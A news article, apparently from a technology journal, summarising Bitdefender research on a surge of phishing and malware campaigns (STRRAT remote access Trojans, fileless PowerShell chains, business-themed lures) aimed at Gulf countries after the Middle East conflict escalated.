The Bitdefender company has published new research that reveals a sharp increase in cyberattacks in phishing and malware campaigns targeting Gulf countries following the escalation of the conflict in the Middle East.

According to the company’s analysis, malicious activity began to intensify on February 28, just a few days after the increase in tension in the region, and has remained at significantly elevated levels since then. Specifically, attacks have grown by an average of 130% compared to pre-conflict levels, reaching peaks of activity close to four times the usual volume.

This spike highlights how cybercriminals are able to take advantage of geopolitical events in real time to increase the effectiveness of their campaigns. In this case, attackers have mainly resorted to business-themed lures – such as invoices, contracts, bank communications or delivery notifications – to deceive both organizations and individual users.

Techniques and methods of detected attacks

Bitdefender research detects advanced techniques such as Java-based remote access Trojans (STRRAT family) and fileless PowerShell attacks (attacks that leave no files and use system tools to go undetected). These threats operate in memory to make detection difficult. Likewise, complex infection chains have been observed aimed at guaranteeing persistence within compromised systems.

Although some campaigns make direct reference to the current geopolitical context, Bitdefender notes that there is no confirmed attribution to state actors, and that much of the activity could be linked to opportunistic cybercriminals. However, it warns that this type of attack is usually the gateway to more sophisticated threats, by facilitating initial access to corporate environments.

Much of the activity could be linked to opportunistic cybercriminals

In addition to the sustained increase in malicious emails directed at Gulf countries, the company points out another series of key findings that can be consulted:

  • Peak activity increased approximately fourfold compared to pre-war phishing levels, with several consecutive days of high volume.
  • Campaigns rely heavily on engaging elements related to the business world: invoices, contracts, banking, and deliveries.
  • Attackers use multiple malware delivery techniques, including Java-based RATs and fileless PowerShell chains.
  • Evidence of multi-stage attacks designed for stealth and persistence.
  • The infrastructure and themes sometimes reference current geopolitical events.
  • At this stage the activity has not been directly attributed to state-sponsored threat actors; such activity could include opportunistic cybercrime campaigns that exploit the situation.
Alex Chen
Alex Chen

Alex Chen serves as the chief editor of Asia Tech Journal, bringing over a decade of experience in technology journalism. Previously writing for several globally renowned publications, Alex is celebrated for his insightful analyses and in-depth reporting on tech trends across Asia. Passionate about innovation, Alex specializes in the dynamic technology ecosystem of China and its global impacts.